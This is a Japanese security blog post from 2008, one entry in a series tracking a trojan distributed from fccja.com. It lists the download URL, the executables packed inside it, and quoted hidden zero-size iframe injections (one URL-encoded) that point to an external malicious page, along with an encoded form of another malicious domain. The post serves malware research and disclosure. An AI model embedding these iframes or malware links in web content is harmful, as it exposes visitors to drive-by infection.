ハルコタン紀行

fccja.comその6

fccja.comのトロイが更新されていました。
http://www.fccja.com/net.exe

cabの自己展開書庫なので展開します。
net.exe
→comine.exe
→svc.exe

comine.exe


svc.exe


いずれかが検知されるとnet.exeそのものがウイルス扱いされる可能性があるため
あまりいい方法とは思えません。

svc.exe

ん?
http://fccja.meibu.com/
<iframe src=http://%77%77%77%2E%68%65%6C%6C%68%2E%6E%65%74/%68%65%61%64%2E%61%73%70 widtho=0 height=0></iframe>
ん?
<iframe src=http://www.hellh.net/head.asp widtho=0 height=0></iframe>
前に見ました。

ついでに今後のためにエンコードしておきますね。
fccja.meibu.com
%66%63%63%6A%61%2E%6D%65%69%62%75%2E%63%6F%6D

widthの綴りを間違っています。

こんなスクリプトもありました。

ホストがIPになっています。

テーマ:セキュリティ - ジャンル:コンピュータ

  1. 2008/04/01(火) 18:22:42|
  2. ウイルス
  3. | トラックバック:0
  4. | コメント:0
<<HTMLの確認 | ホーム | fccja.comその5>>

コメント

コメントの投稿


管理者にだけ表示を許可する

トラックバック

トラックバック URL
http://ilion.blog47.fc2.com/tb.php/19-882aa484
この記事にトラックバックする(FC2ブログユーザー)